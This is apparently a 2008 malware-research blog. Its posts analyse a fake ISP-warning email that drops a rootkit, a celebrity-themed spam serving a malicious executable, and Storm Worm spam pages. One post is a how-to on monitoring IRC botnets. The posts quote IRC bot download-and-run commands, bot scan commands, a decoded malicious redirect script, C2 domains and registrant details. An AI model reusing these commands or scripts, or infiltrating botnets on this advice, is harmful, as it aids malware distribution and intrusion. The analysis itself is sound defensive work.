Many people have received an email:

Your internet access is going to get suspended

The Internet Service Provider Consorcium was made to protect the rights of software authors, artists.
We conduct regular wiretapping on our networks, to monitor criminal acts.

We are aware of your illegal activities on the internet wich were originating from

You can check the report of your activities in the past 6 month that we have attached. We strongly advise you to stop your activities regarding the illegal downloading of copyrighted material of your internet access will be suspended.

Sincerely
ICS Monitoring Team

Attached is a zip file, in my case user-EA49943X-activities.zip.

MD5's:

6ba40e29db8fb6f9145fde7a45708875 user-EA49943X-activities.exe
92d9f920d470e3bc12a33768893fd734 user-EA49943X-activities.zip

Once opened the victim machine is infected with a rootkit and two seemingly random high TCP ports are opened.
The rootkit hides the presence of %system32%\cabpck.dll and %system32%\krnlcab.sys. You can identify if your infected by opening a command prompt and typing: type c:\windows\system32\krnlcab.sys Unless your infected, the response will be "The system cannot find the file specified."

Currently VirusTotal shows 22/36 AV Vendors have signatures out to detect the binary. The most common signature is Goldun (Spyware/Rookit/Password Stealer)

The Anubis results are here.

The following registry keys are created/modified to start the rootkit on reboot:

HKLM\​System\​CurrentControlSet\​Services\​krnlcab
HKLM\​SYSTEM\​CurrentControlSet\​Control\​SafeBoot\​Minimal\​krnlcab.sys

Contact is made with either social-bos.biz or osliki.net. Snort signatures that watch for URI Content "data.php?trackid=" should catch infected hosts.

the "trackid" contains a hex encoded string like:

706172616D3D636D64266C616E673D454E552669643D30267368656C6C3D3026736F636B73706F72
743D3439303532267665723D39412668747470706F72743D323638303626757074696D656D3D372675
7074696D65683D30267569643D5B43374132393038313039413641363141395D

Which translates to:

param=cmd&lang=ENU&id=0&shell=0&socksport=49052&ver=9A&httpport=26806&uptimem=7&uptimeh=0&uid=[C7A2908109A6A61A9]

My good friend Joel Esler from Sans ISC reported on something like this a couple weeks ago: http://isc.sans.org/diary.html?storyid=4927.

As of 16:08 UTC 2008/9/12:

social-bos.biz has address 91.200.144.8
osliki.net has address 195.93.219.207

Technical contact for social-bos.biz:

Name: Denis Klinov
Organization: Denis LTD
Address1: Ne dom i Ne uica
City: Big city
Postal Code: 239932
Country: Russian Federation
Country Code: RU
Phone Number: +7.4955123456
Email: pavelzosimov@yandex.ru

Technical Contact for osliki.net:

Name: Anton Butov
Email: buhalovvasya@yandex.ru
Organization: Inner Tec
Address: Stroitelnaya 77 15
City: Moscow
State: Moskovskaya
ZIP: 676437
Country: RU
Phone: +7.4952176185

UPDATE: Emerging Threats has posted Snort signatures to detect infected hosts:

http://doc.emergingthreats.net/2008545

I will continue to monitor this run and report any findings.

Labels: Anubis Sandbox, Emerging Threats, malware research, rookits, virustotal

Occasionally my spam folder gets some really exciting messages. However, the subject of is one left me a bit disappointed.

Poor Paris - it must be really bad when even the little green men aren't interested in her.

From: "Magnus Bonnel"
To: [REDACTED]
Subject: Paris Hilton Returned By Aliens
Date: Thu, 21 Aug 2008 22:02:07 -0400
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3198


PLAY NOW

The image would have displayed for any of you who had HTML parsing enabled within your email client. I cropped it at the chest for a "G" rating. The nipples were blurred already. If you clicked that image, you'd happily download player.exe from roskiman.com. Similar spam points to merk2web.com.ar offering stream.exe. The second version wasn't censored. An unsuspecting individual would get an eye full of this womans breasts (cropped for worksafe rating):



a3aec9130af6f69c715dc6eb89949079 stream.exe
a3aec9130af6f69c715dc6eb89949079 player.exe

Anubis results for the binary are available here.

Labels: Anubis Sandbox, http emails, spam

This post is mainly for people interested in researching botnets. Many people treat botnet monitoring as a hobby. In many ways, its almost as fun as people watching.

Section 1, the rules of behavior:

You will likely see information you should not normally be privy to. For example, keylogged data, passwords, IP's of vulnerable systems, instant messenger conversations, etc. You must not repeat any private information you see. You must not use any private information you see. You may report leaks of private information to the victim (if known) or law enforcement. Do not report such information to botnet monitoring groups, mailing lists or blogs. Remember, you too could be the victim some day. Treat the data you see with respect.

You may at some point get admin rights on the botnet - Occasional hiccups happen. You must not issue any commands to disrupt the botnet or remove the drones. Issuing commands places you in the same category as the attacker, and in many countries you can be charged criminally if caught. There have been extreme cases where botnet authors replace the remove function with hostile code that causes more damage to the victim PC.

You may contact ISP's, domain registrars, and victims in attempts to get the botnet taken offline. You will likely receive the hairy eyeball - be prepared to back up your accusations/statements with hard facts.

In some countries monitoring botnets is illegal, in others there has not yet been a ruling. Check your local laws before monitoring! Understand you accept all risks. If your not comfortable with this, don't read any further.

You will likely get attacked or threatened. As you learn how the botnets work, you will likely tip your hand. Everyone does. Since botnet hunting has become such an interesting hobby, there are hundreds of other people making these mistakes too. For that reason, the botnet operators (aka herders) have a keen eye and can identify snoopers quickly. In most cases you will simply be denied access to the botnet, by IP banning. In others you will be threatened by the botnet operator, or hit with denial of service attacks. This generally upsets your internet service provider, and you could risk losing internet access.

Never, ever, use proxys to snoop on botnets. If your too chicken to do it from IP addresses you have legitimately rented, then don't track botnets. Using proxy's means you're placing someone else at risk for denial of service attacks, and repeated attacks could mean they lose internet access. While there is a certain risk proxy operators take, your sloppy botnet monitoring skills should not be one of them. Dialup accounts are cheap, between 5 and 10 dollars a month in the US. Use one if you're worried about staying anonymous. Additionally you don't know who may be intercepting proxy traffic. A proxy operator may not be as honest as you, and may use captured botnet traffic maliciously.

Section 2, Locating binaries:

For this section I turned to my old Standby, SearchIRC. Using the keywords ".download http:// .exe" I was able to find:

.download http://www[dot]kartalkusculari[dot]com/oky.exe C:/oky.exe 1
Connects to:
Server: irc.webmaster.com
Port: 6667
Channel: #pert
Channel Topic: .advscan asn2 200 5 0 -r -b
Also downloads http://www[dot]freewebtown[dot]com/hidex/test.exe

.http.exe http://www[dot]freewebtown[dot]com/ssexs/mode.exe C:mode.exe 1
Connects to:
Server: irc.webchat.org
Port: 6667
Channel: #Scanall`

.scarikiamo http://www[dot]freewebtown[dot]com/n0mad/abdo.exe c:/abdo.exe 1
Connects to:
Server: f0ryou.no-ip.info
Port: 6667
Channel: ##!scanall, ##!scanallexp

Other malicious files can be found by looking through the archives at MalwareDomainList and OffensiveComputing.

Section 3, extracting information:

Malware disassembly is an art, and something that can't be explained in a paragraph or two. However there are a few online sandboxes that will assist you as you get started botnet hunting. Anubis and CWSandbox are great. If you have time and resources to spare, investigate creating your own Truman sandnet. Once you've decided to manually reverse engineer malware, I suggest looking around OpenRCE, and attending an Assembler class at a local college.

Other useful tools for new hunters include: Process Explorer, Malcode Analysis Pack, IdaPro, OllyDbg, Cygwin, Perl and Python.

Section 4, putting it all together:

Once you've downloaded a binary, upload it to one of the free sandbox tools listed above. These tools will give pretty detailed information. If your binaries Command and Control (C&C) method is IRC, fire up Infiltrator. Using the sandbox details you should be able to set your username, nickname, and software version to mimic the bot. Connect to the botnet and log the traffic (if permitted by local Laws).

Keep a journal of what you see, learn how the bot interacts with the operator. Learn the commands commonly used, and watch for additional malware as the bots are updated or moved. Note any click-fraud or denial of service attacks.

Section 5, moving on:

Computer security doesn't start or stop with botnets and malware. There are so many more things to explore and learn. Attend conferences, join local user groups and mailing lists, obtain SANS certifications. You never know what the next big thing will be. Stay cutting edge and you will enjoy everything computer security has to offer.

Labels: Anubis Sandbox, Botnet monitoring, Computer Security, Infiltrator, malware research, TOR

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded Javascript. It decodes to:

<script type="text/javascript">
if (top.location != location) {
top.location.href = document.location.href ;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

That site opened by the Javascript looks like this:


The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.

Labels: Anubis Sandbox, Fake Codec, javascript, nuwar, peacomm, peed, Storm, targeted malware